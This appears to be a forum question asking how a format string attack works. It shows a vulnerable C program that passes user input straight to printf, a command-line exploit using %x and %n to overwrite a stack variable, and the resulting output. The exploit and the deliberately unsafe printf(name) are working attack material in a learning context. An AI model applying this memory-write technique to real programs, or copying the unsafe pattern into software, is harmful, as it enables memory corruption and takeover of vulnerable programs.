7Ağu
Format string attack with printf
We can do a format string attack in the following way:
$ ./program.out $(echo -en '\xa8\xd1\xff\xff')%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%n
Address of name: ffffd1ac, secret: ffffd1a8
ffffd849.ffffd1a8.565561b7.3.0.0.ffffd684.f7d6e70c.f7feec36.12345678.
secret: 70
The program then passes the input to the printf function:
int main(int argc, char *argv[]) {
char name[1024];
int secret = 0x12345678;
printf("Address of name: %8x\n", &name);
strcpy(name, argv[1]);
printf(name);
some_function(secret);
return 0;
}
However, I am confused how we managed to make sure that the number of characters (70) is written to the address of secret? I see that in the argument to program.out we have "$(echo -en '\xa8\xd1\xff\xff')" (which is the address of secret), but how does this exactly work? How is %n exactly mapped to that given address?
Thank you in advance.
